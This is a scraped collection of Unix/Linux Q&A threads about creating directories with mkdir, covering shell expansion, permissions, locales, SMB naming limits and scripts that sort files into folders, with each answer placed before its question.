$_ - Gives the last argument to the previous command. At the shell startup, it gives the absolute filename of the shell script being executed. When you execute mkdir test mv file.c $_Check if your mv, cp is an alias In bash to acces the last arg to the previous command in History use !:$ ,like: > mkdir test > mv file.c !:$ mv file.c test
I face the problem with $_ usage, which $_ special parameter in terminal, And its call the last argument of the previous command. It was not work with cp and mv command in gnome-terminal.It happen to me during folder creation and mv or cp file with $_ like below mkdir test cp file.c $_instead of copying file to destination , it create a file in current directory named _filedir. Same happen with mv command mkdir test mv file.c $_instead of moving file to destination, It moving in the name _filedir. To find the problem i use echo $ mkdir test $ echo $_ _filedirWhy is $_ not working with cp, mv commands?
$_ not working with copy and move commands
Try this: IFS= read -r -p "Folder name: " dir mkdir -p "/foo/${dir}/"{mailserver,dnsserver,minecraftserver,syslogserver}
I use SCP a lot to transfer log files from servers to a jumpbox where I can analyse and troubleshoot etc. If I have a cluster of servers and I want to create a set of subdirectories I do it like this: mkdir -p /foo/bar-nnn/{mailserver,dnsserver,minecraftserver,syslogserver}Lets's say 'bar-nnn' is a reference of sorts; be that a ticket number or incident etc. What I want to be able to do is run a script or a shell command which will prompt me for what 'bar-nnn' should be then go and create all the subfolders required. I'm pretty sure I'm going to need a for loop but can't quite get my head around it.
Create subdirectories under a parent but prompt for the name of the parent
I ended up using the overlayfs-etc.bbclass feature from Yocto instead, which is available since Yocto 4.0. Documentation at: https://docs.yoctoproject.org/ref-manual/classes.html#ref-classes-overlayfs-etc The bbclass patches the init process in /sbin/init to create the folders at runtime before mounting the overlay. See: https://git.yoctoproject.org/poky/plain/meta/files/overlayfs-etc-preinit.sh.in Adding it to you image is really simple: Add to your machine.conf: OVERLAYFS_ETC_MOUNT_POINT = "/data_local" OVERLAYFS_ETC_DEVICE = "/dev/mmcblk0p6" OVERLAYFS_ETC_FSTYPE = "ext4" OVERLAYFS_ETC_MOUNT_OPTIONS = "defaults,sync"Add to your image: IMAGE_FEATURES:append = " overlayfs-etc"Of course you must make sure your boot medium has an extra read-write mounted partition already available (in the image flashed to SD card) - in my case mmcblk0p6.
On an embedded device based on Yocto Linux my rootfs is RO, while I have an additional partition for RW data. Now I want to automount at boot an overlay onto /etc stored on a different partition. Here is my fstab: /dev/mmcblk0p6 /data_local ext4 defaults,sync,noexec,rw 0 2 [...] overlay /etc overlay defaults,lowerdir=/etc,upperdir=/data_local/overlayfs/upper/etc,workdir=/data_local/overlayfs/workdir,X-mount.mkdir,x-systemd.requires=/data_local,x-systemd.before=local-fs.target,x-systemd.before=systemd-networkd 0 0However, this fails because the upperdir and workdir directories are missing on first boot. How can I let fstab or systemd.mount automatically create these directories?
fstab and systemd automount overlay
You're nearly there. What you're missing is that you also need to try to strip the bracketed number from the filename to derive the directory: #!/bin/sh for file in *.txt do dir="${file%.txt}" # Remove suffix dir="${dir%(*)}" # Remove bracketed suffix if present mkdir -p -- "$dir" # Create if necessary mv -f -- "$file" "$dir" # Move the file doneYou can prefix the mkdir and mv with echo to see what would happen before you action it.
My question is a bit different than: Create directory using filenames and move the files to its repective folder Since in the same folder I have two similar copy of each file like: 001.txt and 001(1).txt ..... 100.txt and 100(1).txt For each two similar copies, create one folder and move both similar copies into one folder. 001.txt and 001(1).txt into 001 folder Base on above question, but does't work. command from above question: set -o errexit -o nounset cd ~/myfolder for file in *.txt do dir="${file%.txt}" mkdir -- "$dir" mv -- "$file" "$dir" doneHave tried: set -o errexit -o nounset cd ~/myfolderfor file in *(1).txt do dir="${file%.txt}" mkdir -- "$dir" mv -- "$file" "$dir" doneThis command will create folder for each file. Any suggestion to distinguish files like 001.txt and 001(1).txt, so we can select the desired file to create one folder, then run another command to archive the same goal?
Create directory using filenames and move the files to its respective folder
I found the answer: tsudo mount -o remount,rw /*tsudo it's sudo for termux
When I make install reaver in termux the following error occurs: ./install.sh -D -m 755 wash /usr/local/bin/wash mkdir: cannot create directory ‘/usr’: Read-only file system make: *** [Makefile:140: install] Error 1I tried to mount -o remount,rw /system: mount: '/system' not in /proc/mountsI also tried mount -o rw,remount /: mount: '/dev/block/platform/soc/7824900.sdhci/by-name/system' not user mountable in fstabNone of them helped.
Can't mount /system read-write
By default, ranger doesn't use mkdir flags. (I tried to pass it, and it doesn't work.) But ranger provides the use of alias. alias [newcommand] [oldcommand] Copies the oldcommand as newcommand.So when you launch ranger you can set one to execute mkdir with the flags you need. :alias mkdir shell mkdir -pAnd then you can do: :mkdir dir1 dir2 dir3
As in the equivalent of mkdir dir1 dir2 when running in bash. This creates two separate directories, dir1 and dir2. If you run :mkdir dir1 dir2 in ranger, it simply creates a directory called 'dir1 dir2'.
How to create multiple directories in Ranger?
With the input you have provided I was able to accomplish this with the following command while read -r dir; do mkdir -p ./"$dir"; done< <(sed 's@ > @/@g' input)You can replace ./ with the directory path you would like the directory tree to start in, if not the current directory. This uses sed to convert your input lines from something like: ALFA ROMEO > 147 > Scheinwerferblendento: ALFA ROMEO/147/ScheinwerferblendenThen it feeds this output to a while loop that uses mkdir -p to create the directory tree. $ cat input ALFA ROMEO > 147 > Scheinwerferblenden ALFA ROMEO > 156 > Scheinwerferblenden ALFA ROMEO > 156 > Kühlergrill AUDI > 80 B3 > Heckspoiler $ while read -r dir; do mkdir -p ./"$dir"; done< <(sed 's@ > @/@g' input) $ tree . ├── ALFA\ ROMEO │ ├── 147 │ │ └── Scheinwerferblenden │ └── 156 │ ├── K\303\274hlergrill │ └── Scheinwerferblenden ├── AUDI │ └── 80\ B3 │ └── Heckspoiler └── input9 directories, 1 file
I have a excel file which i will convert to csv or txt file with following data: ALFA ROMEO > 147 > Scheinwerferblenden ALFA ROMEO > 156 > Scheinwerferblenden ALFA ROMEO > 156 > Kühlergrill AUDI > 80 B3 > Heckspoiler . .and so on I need to create folders and subfolders based on this data with following syntax: ├───ALFA ROMEO │ ├───147 │ │ └───Scheinwerferblenden │ └───156 │ ├───Scheinwerferblenden │ └───Kühlergrill │ └───AUDI └───80 B3 └───HeckspoilerI tried to write mkdir -p bash scripts but with no success.
Create folders and subfolders from csv/txt file
The line rsync -azv --progress /mnt/data/seafile/ $FOLDER_PATHmay be resetting the timestamp to that of seafile. You can work around this by touch $FOLDER_PATH after the rsync.
I have the following script: #------------------------ SETTINGS FOLDER_NAME="$(date '+%Y_%b_%d')" LOG_PATH=/home/alex/logs/backup-seafile-$FOLDER_NAME.log DIR_PATH=/mnt/data/Backups/Seafile FOLDER_PATH=$DIR_PATH/$FOLDER_NAMEecho "--------------------------------------------" >> $LOG_PATH echo "[$(date '+%Y %b %d %H:%M:%S')] Running Seafile backup" | tee -a $LOG_PATHecho "[$(date '+%Y %b %d %H:%M:%S')] Deleting old backups..." | tee -a $LOG_PATH #find $DIR_PATH/* -type d -ctime +7 -print -exec rm -rf {} \; >> $LOG_PATHecho "[$(date '+%Y %b %d %H:%M:%S')] Stopping seafile..." | tee -a $LOG_PATH /opt/seafile/seafile-server-latest/seafile.sh stop /opt/seafile/seafile-server-latest/seahub.sh stopecho "[$(date '+%Y %b %d %H:%M:%S')] Collecting garbage..." | tee -a $LOG_PATH /opt/seafile/seafile-server-latest/seaf-gc.shecho "[$(date '+%Y %b %d %H:%M:%S')] Creating backup folder..." | tee -a $LOG_PATH mkdir $FOLDER_PATHecho "[$(date '+%Y %b %d %H:%M:%S')] Databases..." | tee -a $LOG_PATH mysqldump -h localhost -uUSER -pPASSWORD --opt ccnet-db > $FOLDER_PATH/ccnet-db.sql mysqldump -h localhost -uUSER -pPASSWORD --opt seafile-db > $FOLDER_PATH/seafile-db.sql mysqldump -h localhost -uUSER -pPASSWORD --opt seahub-db > $FOLDER_PATH/seahub-db.sqlecho "[$(date '+%Y %b %d %H:%M:%S')] Data..." | tee -a $LOG_PATH rsync -azv --progress /mnt/data/seafile/ $FOLDER_PATH | tee -a $LOG_PATHecho "[$(date '+%Y %b %d %H:%M:%S')] Starting seafile..." | tee -a $LOG_PATH /opt/seafile/seafile-server-latest/seafile.sh start /opt/seafile/seafile-server-latest/seahub.sh startecho "[$(date '+%Y %b %d %H:%M:%S')] Backup Complete!" | tee -a $LOG_PATHI recently noticed that I only ever had one folder and realized it was because all of the backups have the same timestamp of a past date, hence being deleted by the commented out line. I have no idea where its getting this date from or how to change it. Running mkdir normally results in a folder with the correct date. What gives?
Folders created with script have wrong modified timestamp
You can't have two files by the same name at the same time, so you'll need to first create the directory under a temporary name, then move the file into it, then rename the directory. Or alternatively rename the file to a temporary name, create the directory, and finally move the file. I see that Nautilus scripts can be written in any language. You can do this with the most pervasive scripting language, /bin/sh. #!/bin/sh set -e for file do case "$file" in */*) TMPDIR="${file%/*}"; file="${file##*/}";; *) TMPDIR=".";; esac temp="$(mktemp -d)" mv -- "$file" "$temp" mv -- "$temp" "$TMPDIR/$file" doneExplanations:set -e aborts the script on error. The for loop iterates over the arguments of the script. The case block sets TMPDIR to the directory containing the file. It works whether the argument contains a base name or a file path with a directory part. mktemp -d creates a directory with a random name in $TMPDIR. First I move the file to the temporary directory, then I rename the directory. This way, if the operation is interrupted in the middle, the file still has its desired name (whereas in the rename-file-to-temp approach there's a point in time when the file has the wrong name).If you want to remove the file's extension from the directory, change the last mv call to mv -- "$temp" "$TMPDIR/${file%.*}"${file%.*} takes the value of file and removes the suffix that matches .*. If the file has no extension, the name is left unchanged.
How can I create a Nautilus script that moves a the selected file into a new folder with the same name? My starting point: /home/user/123 here 123 is a file with no extension My goal here is to achieve this result: /home/user/123/123 here we have the same file 123 inside new folder also named 123 I can't figure this out, because every atempt I've made gave me the result: mkdir: cannot create directory `123': File exists
Nautilus-script to move file into same name directory
As pointed out in the comments, the problem was just the display of the folders which was messed up due to badly configured locales. Running locale on the debian system would show (note the warning here): ~> locale locale: Cannot set LC_ALL to default locale: No such file or directory LANG=en_US.UTF-8 LANGUAGE=en_US.UTF-8 LC_CTYPE="en_US.UTF-8" LC_NUMERIC=de_AT.UTF-8 LC_TIME=de_AT.UTF-8 LC_COLLATE="en_US.UTF-8" LC_MONETARY=de_AT.UTF-8 LC_MESSAGES=en_US.UTF-8 LC_PAPER=de_AT.UTF-8 LC_NAME=de_AT.UTF-8 LC_ADDRESS=de_AT.UTF-8 LC_TELEPHONE=de_AT.UTF-8 LC_MEASUREMENT=de_AT.UTF-8 LC_IDENTIFICATION=de_AT.UTF-8 LC_ALL=but locale -a only showed ~> locale -a C C.UTF-8 en_US.utf8 POSIXNote that de_AT.UTF-8 is missing in the second list. Running dpkg-reconfigure locales and selecting de_AT.UTF-8 solves the issue.
I have a system which is set up with Debian. Running the command mkdir xx_üon this system, creates a directory called 'xx_'$'\303\274'. Running the same command on a system that is set up with Ubuntu creates a directory called xx_ü which is what I would need. How do I get the system set up with Debian to create the directory correctly containing the german umlauts?Debian system: Linux helios64 5.10.63-rockchip64 #21.08.2 SMP PREEMPT Wed Sep 8 10:57:23 UTC 2021 aarch64 GNU/Linux Ubuntu system: Linux tikey-TUXEDO 5.13.0-28-generic #31-Ubuntu SMP Thu Jan 13 17:41:06 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Why does mkdir messes up special characters (german umlauts)?
you can list your files in list from ls > list for example then use a loop-read of it to build sub-folders & then move the files dispatching them in the good one from its name as a pattern filter. here I made a test from empty files touch filename to demonstrate method bash-4.4$ while read > do > if [ ! -d ${REPLY/_*/} ]; then > mkdir ${REPLY/_*/} > fi > done < listbash-4.4$ #here directories are made then use similar method for moving files bash-4.4$ while read; do if [ -f $REPLY ] ; then mv $REPLY ${REPLY/_*/}/${REPLY/*_/} ; fi ; done < list bash-4.4$ tree . ├── identifier │ └── desiredName.m ├── identifier1 │ ├── desirename1.m │ └── desirename.m ├── identifier2 │ └── desirename2.m └── list3 directories, 5 files bash-4.4$ 5~You can do direct use in shell or use similar syntax in a script of course.
As an example, I have a directory with multiple files in this general format: dir1/identifier1_desiredName1.m dir1/identifier1_desiredName2 dir1/identifier1_desiredName3.m dir1/identifier2_desiredName1.m dir1/identifier2_desiredName2.m dir1/identifier3_desiredName1.m dir1/identifier3_desiredName2.m dir1/identifier3_desiredName3 dir1/identifier4_desiredName1.m dir1/identifier4_desiredName2.m dir1/jabberwocky-mimsy-borogoves dir1/other--should-not-be-movedI'm trying to come up with a script that separates the files by the identifier by making a directory using that identifier, and then move files with the same identifier into that directory. By the end of the moving, I would like to have something like: dir1/identifier1/desiredName1.m dir1/identifier1/desiredName2 dir1/identifier1/desiredName3.m dir1/identifier2/desiredName1.m dir1/identifier2/desiredName2.m dir1/identifier3/desiredName1.m dir1/identifier3/desiredName2.m dir1/identifier3/desiredName3 dir1/identifier4/desiredName1.m dir1/identifier4/desiredName2.m dir1/jabberwocky-mimsy-borogoves dir1/other--should-not-be-movedAs of right now, I think that I'm on the right track for the directory making: awk _ {print $1} | uniq | mkdirSyntax probably isn't quite correct, but the general idea is to print out the first column, separated by _, omitting repeats, and then piping those names into mkdir. But then I'm at a loss for moving the files into the directories. I was thinking about using grep similarly (replacing mkdir above and then piping into mv), but I wasn't sure if it would work.
How to make multiple directories and move multiple files
There are multiple problems with your script:there has to be a ; between the ] and then (as @heemayl also indicated) or then should be put on a line of its own there has to be a space between handouts" and ] you should (but this doesn't generate an error) consistently indent, or use the -m option for mkdir (as @skwlisp indicated)something like: if [ -d "/$home/DB_handouts" ] then echo "Directory DB_handouts found" else mkdir -m 777 /$home/DB_handouts fiThe above of course assumes that /$home exists, the whole thing can be much more easily achieved by using: mkdir -p -m 777 /$home/DB_handoutsWith -p there will be no complaints if the directory already exists.
I have the following bash script: if [ -d "/$home/DB_handouts"] then echo "Directory DB_handouts found" else mkdir /$home/DB_handouts chmod 777 /$home/DB_handouts fiRunning the above code produces an error: ./file.sh: line 12: syntax error near unexpected token `else' ./file.sh: line 12: ` else'How can I fix this?
use of if else in linux to find whether the folder exists or not
You can create the directories while hiding any error related to the directory already existing: for custDir in /media/storage/sqlbackup/CUSTOMER* do mkdir -p "$custDir"/{daily,weekly,monthly} doneYou cannot use /media/storage/sqlbackup/CUSTOMER*/{daily,weekly,monthly} because the {...} sequence is expanded before the wildcard, and a wildcard pattern will only match files/directories that exist.
I have the following directory structure: /media/storage/sqlbackup/CUSTOMER1 /media/storage/sqlbackup/CUSTOMER2 ... /media/storage/sqlbackup/CUSTOMER*Each CUSTOMER* directory may contain subdirectories named daily, weekly, and monthly. If a CUSTOMER* directory does not contain daily OR weekly OR monthly, I want it to be created, if it does, then I want it to remain. Before: CUSTOMER1/daily After: CUSTOMER1/{daily,weekly,monthly} I was trying to do this with clever use of find, but trying to return all that don't match.
Find all directories NOT containing matched subdirectory and create them
Colons aren’t valid characters on SMB/CIFS shares — Windows uses them for drive letters. The failing directory name contains one, which is why mkdir fails.
I have a network (samba) share mounted at /run/user/1000/gvfs/smb-share:server=wdmycloud,share=family. Most activities work fine within the share - I can move stuff around, create and delete files, etc. However, if I cd into Music/Various Artists (both of which definitely exist) and try to create a specific directory, it fails: $ mkdir "Pretty in Pink: The Original Motion Picture Soundtrack" mkdir: cannot create directory ‘Pretty in Pink: The Original Motion Picture Soundtrack’: No such file or directorymkdir -p also fails: $ mkdir -p "Pretty in Pink: The Original Motion Picture Soundtrack" mkdir: cannot create directory ‘Pretty in Pink: The Original Motion Picture Soundtrack’: No such file or directoryHowever, mkdir functions fine for other directory names: $ mkdir test # no output, directory createdWhat's special about the name Pretty in Pink: The Original Motion Picture Soundtrack that mkdir chokes on it? How can I get around this issue? Please don't judge me for the music, I'm doing this for someone else...
mkdir "No such file or directory" within a directory that exists
By default mkdir, does not create missing intermediate directories. As mentioned in the manual (man mkdir), you can create them with the -p flag mkdir -p pionloop/E_0.3
on a linux machine running CENTOS v 7.8.2003 I am in a directory Neutrinos I now do mkdir /pionloop/ this works. I then go to into this new directory pionloop and do mkdir /E_0.3 and this works as well. I thus have as a result a directory Neutrinos/pionloop/E_0.3. Now, starting in Neutrinos I want to do this in one command and therefore do mkdir /pionloop/E_0.3 and get: `mkdir: cannot create directory ‘/pionloop/E_3.0’: No such file or directory What is going wrong here??
mkdir error: no such file or directory
If you want to understand why this is, you need to understand the difference between files and inodes. rm, rmdir and mv all take action on the inodes describing the file/directory, not the actual file. If you have a file/dir open (e.g. by being in the directory), the inode information is removed, but the actual data file associated with the file/dir is not removed until all file handles pointing to it are closed. So, when you "cd .." the filesystem can swoop in and remove the directory and all its contents. https://en.wikipedia.org/wiki/Inode http://www.grymoire.com/Unix/Inodes.html
I created a directory dir at Desktop and then i keyed in cd dir so as to make dir as my current directory and then i typed in the terminal rmdir /home/user_name/Desktop/dir from the dir directory itself, and surprisingly this removed the dir directory but when i checked my current working directory using pwd it was still showing that i am in the dir directory,So my question is that how it is possible that i am working in a directory that has already been deleted.i am currently working on Ubuntu
Trying to remove current directory using rmdir
The question you present of using a single mkdir command to do the same as the other steps doesn't really involve changing directories. It ends with cd ../.. which brings you back to the directory you were in at the start. In effect, that sequence of commands creates a directory a, then a directory b within it (in other words, a/b), then a directory c within the just created b (in other words, a/b/c.) You can do the same with a single mkdir command that creates the nested directories after creating their parents: mkdir a a/b a/b/cAnother way is using mkdir's -p option, which will create the parent directories if necessary, so you don't need to specify them: mkdir -p a/b/cThis doesn't answer your question in the title (for mkdir + cd look at the duplicates from the comments), but addresses the question in your text, about the equivalent single mkdir command for that sequence, in which at the end of the sequence the directory is the same as at the start of it.
Quick question: Is it possible to use "mkdir" to make a new directory AND change to that directory at the same time using a single 'mkdir' command? Whole question: I have this question: What single Linux “mkdir” command could replace the sequence of commands? mkdir a cd a mkdir b cd b mkdir c cd ../..My answer is: mkdir a b c && cd cIs there a single "mkdir" command, without using any other commands, perhaps with some flags or something, I can use to make AND change directory at the same time?
Single "mkdir" command to make a new directory and change to that directory at the same time? [duplicate]
As @Tejas mentioned, you need to understand umask and its values for changing the default permissions. I recommend you read this article so you'll understand how to use it properly. In addition, you should know that it's not permanent, so after rebooting your system the umask value you've set will be gone. To set it in a permanent way, you need to write a new umask value in your shell’s configuration file (~/.bashrc which is executed for interactive non-login shells, or ~/.bash_profile which is executed for login shells). Good Luck
Normally when I make a directory with mkdir the permissions I expect are 751 or 755. However for some reason when new files are created, even in a users home directory, they are set to 700. What controls the default permissions on new files and what kind of configuration change led to this happening?
What do are group permission missing on new directories?
You can't mkdir on a partition. You need to format (that's not the same as assignment of a partition type) it and mount it first
size: 58 GB contents: unknown device: /dev/sda4 partition type: basic data When I ran the format, I selected the type which I expected result in type of Linux. I found a similar issue from 2019, but fdisk wouldn't run the solution. The file type may be suitable, but I haven't been able to run 'mkdir' on the partition. 'Files' doesn't see the partition under "Other Locations". Suggestions welcome.
/dev/sda4/ on USB stick isn't available after formatting. 'Discs' shows the following:
There appears to be many little things in that code snippet that may be causing confusion. First off, as written, $k can sometimes start with a dot (e.g. .1, .2, etc.), which in Unix defines the directory to be a hidden directory. The first thing I would check is whether those directories are created as hidden: ls -ASecond, you are creating the ${k}_${NaMeiFFiLe} on the parent directory, NOT in the new directories that you are creating. Again, since $k starts with a dot in many cases, it may be hidden on the parent directory. Given the flow of your code, I think you meant to save the file within the new sub-directories. If true, that would look something like this (I replaced the regex with ... for simplification): sed -e '...' "${NaMeoFFiLe}" > "${NaMeDiR}/${k}/${k}_${NaMeoFFiLe}"And just as a side note, the mkdir has an option flag -p that can create full directory hierarchies including sub-directories, which means that you wouldn't need an outer loop mkdir: mkdir -p "${NaMeDiR}/${k}"Finally, as a more subjective side note, I'd suggest rethinking how you are capitalizing your variable names, because it's incredibly difficult to read for code reviewers... I think some of the other commenters already found some potential typos that could have been avoided with a better naming convention
I am trying to take a file, modify this file by using a value from a for loop (using sed) and redirecting it to a directory that has been created during the same for loop. Original file > Make directory > process file (make changes) > redirect output to directory My problem is at making the directory with the values of my variables. read NaMeoFFiLe read startepsilonvalue NaMeDiR="${startepsilonvalue}plus10steps" mkdir "${NaMeDiR}" for ((i=$stteps; i<=$lsteps; i+=1)); do k=$(bc <<<"""scale=1; $i /10") echo $k mkdir "${NaMeDiR}/${k}" ls "${NaMeDiR}" sed -e '0,/epsilon = ./{//c\epsilon = '"$startepsilonvalue" -e '}' \ "${NaMeoFFiLe}" > "${k}_${NaMeiFFiLe}" cat "${NaMeDiR}/${k}/${k}_${NaMeoFFiLe}" & doneThe thing is that I can create the first directory, outside the for loop, but then inside the for loop it only creates the first and last directory and it won't do the changes of the sed command. The error that I get is that the file does not exist in the directory that I look for which is obvious because the directory hasn't been created. Is there anything that I am missing?
Creating directories inside a directory, from variable values, to redirect output from sed
A pattern only ever expands to existing names, and the pattern te*/test does not match any existing name. Note that te*/test is one complete pattern and that the te* part is not matched separately from /test. Since the pattern does not match (and since the nullglob and failglob shell options are not set) it is left unexpanded and given to mkdir, which complains when it can't create the subdirectory test in the directory te*. The command cd te* succeeds because the pattern te* matches the name of the existing directory test. If there had been more names that matched te*, you may have received an error from cd.
nathan@gentoodesktop ~/Documents $ mkdir test nathan@gentoodesktop ~/Documents $ mkdir te*/test mkdir: cannot create directory 'te*/test': No such file or directory nathan@gentoodesktop ~/Documents $ cd te* nathan@gentoodesktop ~/Documents/test $ mkdir test nathan@gentoodesktop ~/Documents/test $ ls test
Why does mkdir not work with wildcards? [duplicate]
The other group does not have write permissions in that directory. Write permissions are needed to create directory entries, such as files and subdirectories. To give the other group write permissions, as root do chmod g+w /export/home/opt
In solaris 9 (5.9) I fail to mkdir with user builder, the user exist in the group defined as owner for that path. bash-2.05$ groups builder other root sys bash-2.05$and this is the file structure: bash-2.05$ ls -la / | grep opt lrwxrwxrwx 1 root other 16 Apr 14 2008 opt -> /export/home/opt bash-2.05$ bash-2.05$ ls -la /export/home/ | grep opt drwxr-xr-x 13 root other 512 Jan 24 11:49 opt bash-2.05$builder belong to other group, why does it fail to mkdir in /opt ? bash-2.05$ pwd /opt bash-2.05$ mkdir dire mkdir: Failed to make directory "dire"; Permission denied bash-2.05$
Solaris 9 Fail to mkdir - no permission
If you have a file (named list containing, the following, and you with to create a directory for each line name in file, where the directory name is just the part after ./folder?/folder_. ./folder1/folder_01_PAP_515151 ./folder1/folder_04_PAP_654123 ./folder2/folder_055_PAP_685413 ./folder2/folder_100_PAP_132312 ./folder3/folder_32_PAP_3513131 ./folder3/folder_53_PAP_3213321 ./folder3/folder_84_PAP_3313213Then you can do. cat list | sed -r -e 's~[.]/folder[0-9]+/folder_~~' | xargs -I{} mkdir -p «prefix»{}I have made it so that folder numbers are one or more digits. Leave «prefix» blank, unless you want a prefix.If you wish to just rename the original folders/directories, keeping original content, then you can do: Test with this one. Then remove the -n from rename, to do it for real. find . -type d -name "*_PAP_" | rename -n 's~[.]/folder[0-9]+/folder_~~' Note the search pattern is the same for rename as it is for sed. rename works on filenames, sed works on files or streams. The options to sed: -r use extended regular expressions (the dialect of regular expression to use). -e The next arg is the expression (sed program). 's~[.]/folder[0-9]+/folder_~~' the expression, quoted so that the shell does not interpret it.The expression explained: s~[.]/folder[0-9]+/folder_~~s do a search and replace ~ the separator character it separates the expression into sections, you can use any character, but must use the same one each time. s~«search_for»~«replace_with»~«options» or using a different character s@«search_for»@«replace_with»@«options». «search_for» a regular expression:[.] a dot /folder just what it says. [0-9] a digit. + one or more of the preceding atom (the digit) (so one or more digits). /folder_ just what it says.«replace_with» What to replace it with, in this case nothing. «option» in this case note, others include i ignore case, g do it more that once (not just first string found).The sed/rename language is very powerful, though complex. The main parts that you would use are s (as used here), and maybe next y, these are worth learning. You will also have to learn regular expressions (also used by grep, and other commands).
I have parent folder includes sub folders. In every sub folder I have folders as follow: Parent_folder folder1 folder_01_PAP_515151 folder_02_PAPA_554651 folder_03_PAPX_541313 folder_04_PAP_654123 folder2 folder_20_PAP_413513 folder_02_PAPD_521354 folder_055_PAP_685413 folder_100_PAP_132312 folder3 folder_11_PAPE_5313351 folder_32_PAP_3513131 folder_53_PAP_3213321 folder_84_PAP_3313213.. I used the following command to list all the folders and sub folders that contain "PAP" and save it in a text file "list.txt" find -type d -name "*_PAP_" > list.txtThe output was as follow: ./folder1/folder_01_PAP_515151 ./folder1/folder_04_PAP_654123 ./folder1/folder_20_PAP_413513 ./folder2/folder_055_PAP_685413 ./folder2/folder_100_PAP_132312 ./folder3/folder_32_PAP_3513131 ./folder3/folder_53_PAP_3213321 ./folder3/folder_84_PAP_3313213From this list, I want to create new folders and the names of these new folders must contain the parts "three digits_PAP" e.g "055_PAP", "32_PAP", "53_PAP", ... from the previous list. The list of new generated folders must be: 01_PAP 04_PAP 20_PAP 055_PAP 100_PAP 32_PAP 53_PAP 84_PAP
Create folders from specific parts of lines in a text file
To simplify those directory creations, you might consider deploying the -p option to mkdir, and extending your use of "brace expansion"s like for i in {1..22} do echo mkdir -p ${elevdir}$i/0$(printf "%1d%02d" $((i/14+1)) $(((i+10)%24)))-{01..10} done mkdir -p Josef1/0111-01 Josef1/0111-02 Josef1/0111-03 ... mkdir -p Josef2/0112-01 Josef2/0112-02 Josef2/0112-03 ... mkdir -p Josef3/0113-01 Josef3/0113-02 Josef3/0113-03 ... mkdir -p Josef4/0114-01 Josef4/0114-02 Josef4/0114-03 ... mkdir -p Josef5/0115-01 Josef5/0115-02 Josef5/0115-03 ... mkdir -p Josef6/0116-01 Josef6/0116-02 Josef6/0116-03 ... mkdir -p Josef7/0117-01 Josef7/0117-02 Josef7/0117-03 ... mkdir -p Josef8/0118-01 Josef8/0118-02 Josef8/0118-03 ... mkdir -p Josef9/0119-01 Josef9/0119-02 Josef9/0119-03 ... mkdir -p Josef10/0120-01 Josef10/0120-02 Josef10/0120-03 ...The echo is a measure of precaution; remove if happy what you see. If convinced, try a similar approach to the real copying action. At least you could gather ALL cp within one single for i in {1..10}: for i in {1..10} do cp ... cp ... cp ... doneEDIT: Or, even simpler, try for i in {111..123} {200..208}; do echo mkdir -p ${elevdir}$((i-110-i/200*76))/0$i-{01..10}; done
I have a group of 1000+ files that are labeled using text and date in a folder /home/dir/dir2/oldspot with below format: File taken on 01/07/2020 at 23:08 elevation 5 is aaaaaa-bbbb-cc10dddd-L1-202007012308-05.std aaaaaa-bbbb-cc10dddd-L1-"year""month""date""hour""minute"-"elevation".stdFile taken at 02/07/2020 at 01:48 reference file is aaaaaa-bbbb-cc10dddd-L1-202007020148.refI'd like to create a bash script that can sort all the files into sub directories based on matching the time into /home/dir1/yearmonthdayhour (see above for format) and then sorted by elevation into /home/dir/yearmonthdayhour/elevation. I created one but it is not quite automated (i.e. to many mkdir and cp) All data taken on 2020070123 at elevation 05 would be would go into the subdirectory of /home/dir/2020070123/2020070123-05.std The contents of /home/dir/2020070123/2020070123-05.std would be: aaaaaa-bbbb-cc10-dddd-L1-202007012308-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012319-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012331-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012342-05.std aaaaaa-bbbb-cc10-dddd-L1-202007012354-05.stdI have including seven hours worth of data here (characters limited me). The total data spans from 01/07/2020 11:31 (202007011131) to 02/07/2020 08:32 (202007020832) and has 12 files with time stamps about 12-25 minutes apart. aaaaaa-bbbb-cc10dddd-L1-202007012004-00.std aaaaaa-bbbb-cc10dddd-L1-202007012004-01.std aaaaaa-bbbb-cc10dddd-L1-202007012004-02.std aaaaaa-bbbb-cc10dddd-L1-202007012004-03.std aaaaaa-bbbb-cc10dddd-L1-202007012004-04.std aaaaaa-bbbb-cc10dddd-L1-202007012004-05.std aaaaaa-bbbb-cc10dddd-L1-202007012004-06.std aaaaaa-bbbb-cc10dddd-L1-202007012004-07.std aaaaaa-bbbb-cc10dddd-L1-202007012004-08.std aaaaaa-bbbb-cc10dddd-L1-202007012004-09.std aaaaaa-bbbb-cc10dddd-L1-202007012004-10.std aaaaaa-bbbb-cc10dddd-L1-202007012004.ref aaaaaa-bbbb-cc10dddd-L1-202007012016-00.std aaaaaa-bbbb-cc10dddd-L1-202007012016-01.std aaaaaa-bbbb-cc10dddd-L1-202007012016-02.std aaaaaa-bbbb-cc10dddd-L1-202007012016-03.std aaaaaa-bbbb-cc10dddd-L1-202007012016-04.std aaaaaa-bbbb-cc10dddd-L1-202007012016-05.std aaaaaa-bbbb-cc10dddd-L1-202007012016-06.std aaaaaa-bbbb-cc10dddd-L1-202007012016-07.std aaaaaa-bbbb-cc10dddd-L1-202007012016-08.std aaaaaa-bbbb-cc10dddd-L1-202007012016-09.std aaaaaa-bbbb-cc10dddd-L1-202007012016-10.std aaaaaa-bbbb-cc10dddd-L1-202007012016.ref aaaaaa-bbbb-cc10dddd-L1-202007012027-00.std aaaaaa-bbbb-cc10dddd-L1-202007012027-01.std aaaaaa-bbbb-cc10dddd-L1-202007012027-02.std aaaaaa-bbbb-cc10dddd-L1-202007012027-03.std aaaaaa-bbbb-cc10dddd-L1-202007012027-04.std aaaaaa-bbbb-cc10dddd-L1-202007012027-05.std aaaaaa-bbbb-cc10dddd-L1-202007012027-06.std aaaaaa-bbbb-cc10dddd-L1-202007012027-07.std aaaaaa-bbbb-cc10dddd-L1-202007012027-08.std aaaaaa-bbbb-cc10dddd-L1-202007012027-09.std aaaaaa-bbbb-cc10dddd-L1-202007012027-10.std aaaaaa-bbbb-cc10dddd-L1-202007012027.ref aaaaaa-bbbb-cc10dddd-L1-202007012039-00.std aaaaaa-bbbb-cc10dddd-L1-202007012039-01.std aaaaaa-bbbb-cc10dddd-L1-202007012039-02.std aaaaaa-bbbb-cc10dddd-L1-202007012039-03.std aaaaaa-bbbb-cc10dddd-L1-202007012039-04.std aaaaaa-bbbb-cc10dddd-L1-202007012039-05.std aaaaaa-bbbb-cc10dddd-L1-202007012039-06.std aaaaaa-bbbb-cc10dddd-L1-202007012039-07.std aaaaaa-bbbb-cc10dddd-L1-202007012039-08.std 